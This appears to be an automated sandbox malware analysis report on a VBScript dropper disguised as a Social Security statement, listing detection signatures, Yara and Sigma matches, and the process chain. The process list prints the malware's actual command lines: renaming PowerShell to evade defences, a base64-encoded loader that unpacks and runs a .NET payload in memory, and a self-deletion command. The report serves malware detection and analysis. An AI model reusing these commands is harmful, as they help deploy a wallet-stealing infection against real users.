Edit tour
Windows
Analysis Report
Social_Security_Statement_Review.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Renames powershell.exe to bypass HIPS
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 764 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Socia l_Security _Statement _Review.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6416 cmdline:
cmd /c cop y "C:\Wind ows\System 32\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\Des ktop\Socia l_Security _Statement _Review.vb s.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Social_Security_Statement_Review.vbs.exe (PID: 1648 cmdline:
"C:\Users\ user\Deskt op\Social_ Security_S tatement_R eview.vbs. exe" -enc JABWAGkAaA B3AHgAaQBr AHQAZwBuAC AAPQAgAFsA UwB5AHMAdA BlAG0ALgBE AGkAYQBnAG 4AbwBzAHQA aQBjAHMALg BQAHIAbwBj AGUAcwBzAF 0AOgA6AEcA ZQB0AEMAdQ ByAHIAZQBu AHQAUAByAG 8AYwBlAHMA cwAoACkALg BNAGEAaQBu AE0AbwBkAH UAbABlAC4A RgBpAGwAZQ BOAGEAbQBl AC4AUgBlAH AAbABhAGMA ZQAoACcALg BlAHgAZQAn ACwAJwAnAC kAOwAkAEgA ZwB3AHIAYg BjAGkAegBo AGsAIAA9AC AAZwBlAHQA LQBjAG8Abg B0AGUAbgB0 ACAAJABWAG kAaAB3AHgA aQBrAHQAZw BuACAAfAAg AFMAZQBsAG UAYwB0AC0A TwBiAGoAZQ BjAHQAIAAt AEwAYQBzAH QAIAAxADsA IAAkAEsAaQ BoAGoAagBp AGQAbgB5AC AAPQAgAFsA UwB5AHMAdA BlAG0ALgBD AG8AbgB2AG UAcgB0AF0A OgA6AEYAcg BvAG0AQgBh AHMAZQA2AD QAUwB0AHIA aQBuAGcAKA AkAEgAZwB3 AHIAYgBjAG kAegBoAGsA LgBSAGUAcA BsAGEAYwBl ACgAJwBSAE UATQAgACcA LAAgACcAJw ApAC4AUgBl AHAAbABhAG MAZQAoACcA QAAnACwAIA AnAEEAJwAp ACkAOwAkAE MAbwB4AG0A YgB4AG4AZg B0AGgAIAA9 ACAATgBlAH cALQBPAGIA agBlAGMAdA AgAFMAeQBz AHQAZQBtAC 4ASQBPAC4A TQBlAG0Abw ByAHkAUwB0 AHIAZQBhAG 0AKAAgACwA IAAkAEsAaQ BoAGoAagBp AGQAbgB5AC AAKQA7ACQA TwB2AGoAbQ BhACAAPQAg AE4AZQB3AC 0ATwBiAGoA ZQBjAHQAIA BTAHkAcwB0 AGUAbQAuAE kATwAuAE0A ZQBtAG8Acg B5AFMAdABy AGUAYQBtAD sAJABIAHgA YgB6AGgAbQ B5AHQAIAA9 ACAATgBlAH cALQBPAGIA agBlAGMAdA AgAFMAeQBz AHQAZQBtAC 4ASQBPAC4A QwBvAG0AcA ByAGUAcwBz AGkAbwBuAC 4ARwB6AGkA cABTAHQAcg BlAGEAbQAg ACQAQwBvAH gAbQBiAHgA bgBmAHQAaA AsACAAKABb AEkATwAuAE MAbwBtAHAA cgBlAHMAcw BpAG8AbgAu AEMAbwBtAH AAcgBlAHMA cwBpAG8Abg BNAG8AZABl AF0AOgA6AE QAZQBjAG8A bQBwAHIAZQ BzAHMAKQA7 ACQASAB4AG IAegBoAG0A eQB0AC4AQw BvAHAAeQBU AG8AKAAgAC QATwB2AGoA bQBhACAAKQ A7ACQASAB4 AGIAegBoAG 0AeQB0AC4A QwBsAG8Acw BlACgAKQA7 ACQAQwBvAH gAbQBiAHgA bgBmAHQAaA AuAEMAbABv AHMAZQAoAC kAOwBbAGIA eQB0AGUAWw BdAF0AIAAk AEsAaQBoAG oAagBpAGQA bgB5ACAAPQ AgACQATwB2 AGoAbQBhAC 4AVABvAEEA cgByAGEAeQ AoACkAOwBb AEEAcgByAG EAeQBdADoA OgBSAGUAdg BlAHIAcwBl ACgAJABLAG kAaABqAGoA aQBkAG4AeQ ApADsAIAAk AEwAdABnAH QAegB6AHEA YwB1AHYAIA A9ACAAWwBT AHkAcwB0AG UAbQAuAEEA cABwAEQAbw BtAGEAaQBu AF0AOgA6AE MAdQByAHIA ZQBuAHQARA BvAG0AYQBp AG4ALgBMAG 8AYQBkACgA JABLAGkAaA BqAGoAaQBk AG4AeQApAD sAIAAkAFUA aABmAGwAdg AgAD0AIAAk AEwAdABnAH QAegB6AHEA YwB1AHYALg BFAG4AdABy AHkAUABvAG kAbgB0ADsA IABbAFMAeQ BzAHQAZQBt AC4ARABlAG wAZQBnAGEA dABlAF0AOg A6AEMAcgBl AGEAdABlAE QAZQBsAGUA ZwBhAHQAZQ AoAFsAQQBj AHQAaQBvAG 4AXQAsACAA JABVAGgAZg BsAHYALgBE AGUAYwBsAG EAcgBpAG4A ZwBUAHkAcA BlACwAIAAk AFUAaABmAG wAdgAuAE4A YQBtAGUAKQ AuAEQAeQBu AGEAbQBpAG MASQBuAHYA bwBrAGUAKA ApACAAfAAg AE8AdQB0AC 0ATgB1AGwA bAA= MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3376 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - InstallUtil.exe (PID: 6536 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\I nstallUtil .exe" MD5: 909A1D386235DD5F6BA61B91BA34119D) - InstallUtil.exe (PID: 5660 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\I nstallUtil .exe" MD5: 909A1D386235DD5F6BA61B91BA34119D) - InstallUtil.exe (PID: 5440 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\I nstallUtil .exe" MD5: 909A1D386235DD5F6BA61B91BA34119D) - InstallUtil.exe (PID: 6328 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\I nstallUtil .exe" MD5: 909A1D386235DD5F6BA61B91BA34119D) - InstallUtil.exe (PID: 3200 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\I nstallUtil .exe" MD5: 909A1D386235DD5F6BA61B91BA34119D) - InstallUtil.exe (PID: 3156 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\I nstallUtil .exe" MD5: 909A1D386235DD5F6BA61B91BA34119D) - InstallUtil.exe (PID: 5472 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\I nstallUtil .exe" MD5: 909A1D386235DD5F6BA61B91BA34119D) - InstallUtil.exe (PID: 5236 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\I nstallUtil .exe" MD5: 909A1D386235DD5F6BA61B91BA34119D) - powershell.exe (PID: 6268 cmdline:
"powershel l" Start-S leep -Seco nds 5; Rem ove-Item - Path 'C:\U sers\user\ Desktop\So cial_Secur ity_Statem ent_Review .vbs' -For ce MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5492 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |